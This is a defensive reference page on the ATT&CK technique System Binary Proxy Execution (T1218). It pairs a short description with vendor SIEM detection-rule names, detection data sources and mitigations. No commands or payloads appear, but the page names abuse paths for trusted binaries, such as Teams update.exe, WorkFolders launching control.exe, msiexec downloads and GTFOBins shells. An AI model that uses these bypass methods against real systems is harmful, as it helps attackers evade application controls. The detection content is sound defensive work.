T1218: System Binary Proxy Execution
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as split
to proxy execution of malicious commands.
Positive Technologies products that cover the technique
MaxPatrol SIEM knowledge base
sap_suspicious_user_activity: PT-CR-245: SAPASABAP_GW_Rfcexec_call: RFCEXEC run
mitre_attck_defense_evasion: PT-CR-1864: Proxy_Execution_via_WorkFolders: An attacker can launch masqueraded control.exe file in the current working directory using WorkFolders in order to bypass security measures
mitre_attck_defense_evasion: PT-CR-604: Microsoft_Teams_AWL_Bypass: An attempt to bypass application-start restrictions by using update.exe (a binary to update installed NuGet/Squirrel packages included in the Microsoft Teams installation)
mitre_attck_defense_evasion: PT-CR-650: Suspicious_File_Created_by_Legal_Process: Detects creation of suspicious files by legitimate processes
unix_mitre_attck_defense_evasion: PT-CR-1674: Unix_Shell_Command_via_GTFOBINS: An interactive system shell was created using a GTFOBins utility. GTFOBins is a Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
Detection
ID | DS0011 | Data source and component | Module: Module Load | Description | Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. |
---|
ID | DS0029 | Data source and component | Network Traffic: Network Connection Creation | Description | Monitor for newly constructed network connections that are sent or received by untrusted hosts. |
---|
ID | DS0009 | Data source and component | Process: Process Creation | Description | Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. |
---|
ID | DS0009 | Data source and component | Process: OS API Execution | Description | Monitor for API calls that bypass process and/or signature based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. |
---|
ID | DS0024 | Data source and component | Windows Registry: Windows Registry Key Modification | Description | Monitor for changes made to Windows Registry keys and/or values that may forge credential materials that can be used to gain access to web applications or Internet services. |
---|
ID | DS0017 | Data source and component | Command: Command Execution | Description | Monitor executed commands and arguments that may forge credential materials that can be used to gain access to web applications or Internet services. |
---|
ID | DS0022 | Data source and component | File: File Creation | Description | Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity. |
---|
Mitigation
ID | M1042 | Name | Disable or Remove Feature or Program | Description | Many native binaries may not be necessary within a given environment. |
---|
ID | M1050 | Name | Exploit Protection | Description | Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using using trusted binaries to bypass application control. |
---|
ID | M1037 | Name | Filter Network Traffic | Description | Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic. |
---|
ID | M1026 | Name | Privileged Account Management | Description | Restrict execution of particularly vulnerable binaries to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage. |
---|
ID | M1038 | Name | Execution Prevention | Description | Consider using application control to prevent execution of binaries that are susceptible to abuse and not required for a given system or network. |
---|
ID | M1021 | Name | Restrict Web-Based Content | Description | Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc. |
---|